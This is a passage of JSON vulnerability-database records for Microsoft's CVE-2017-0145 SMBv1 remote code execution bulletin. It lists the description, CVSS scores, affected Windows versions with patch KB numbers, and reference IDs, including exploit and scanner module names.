{"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T04:44:31", "differentElements": ["msAffectedSoftware"], "edition": 37}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-12T06:51:00", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012606", "KB4013429", "KB4012212", "KB4012598", "KB4012213", "KB4012215", "KB3210721", "KB3205401", "KB4012216", "KB3212646", "KB3210720", "KB4014077", "KB3213986", "KB4013198", "KBMS16-110, 3187754", "KB4012214", "KB3177186", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T06:51:00", "differentElements": ["msAffectedSoftware"], "edition": 38}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-12T20:49:50", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012606", "KB4013429", "KB4012212", "KB4012598", "KB4012213", "KB4012215", "KB3210721", "KB3205401", "KB4012216", "KB3212646", "KB3210720", "KB4014077", "KB3213986", "KB4013198", "KBMS16-110, 3187754", "KB4012214", "KB3177186", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": 